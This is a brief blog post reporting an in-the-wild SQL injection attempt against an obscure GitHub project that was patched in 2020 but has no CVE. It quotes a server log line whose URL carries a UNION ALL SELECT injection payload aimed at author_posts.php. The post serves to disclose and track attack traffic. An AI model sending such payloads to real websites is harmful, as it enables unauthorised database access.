At work we saw a request come in for an attempted SQL injection exploit. Tracking it down it appears to be fixed and in a fairly obscure GitHub project. Because it doesn’t have a stated license or fixing version, Vuldb can’t issue a CVE ID even though it is being exploited in the wild!
209.141.50.153 – – [22/Oct/2022:19:25:07 -0400] “GET /author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL–%20-&p_id=1 HTTP/1.1” 404 741 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36”
It was fixed in commit d2a906b2cc05ba99d459b58bdb9c24118a043c21 on Aug 8, 2020.
The Darius Freamon Blog 